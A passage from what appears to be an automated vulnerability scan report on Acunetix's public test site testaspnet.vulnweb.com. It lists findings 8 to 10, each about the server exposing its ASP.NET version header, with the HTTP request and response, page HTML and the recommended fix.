          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        8. GET http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13269
          
          
          Response body (13269 bytes)
          
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        9. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 22687
          
          
          Response body (22687 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        10. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30393
          
          
          Response body (30393 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q90tjPbD69UwpHdROB4Qqxfz1aHXA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a 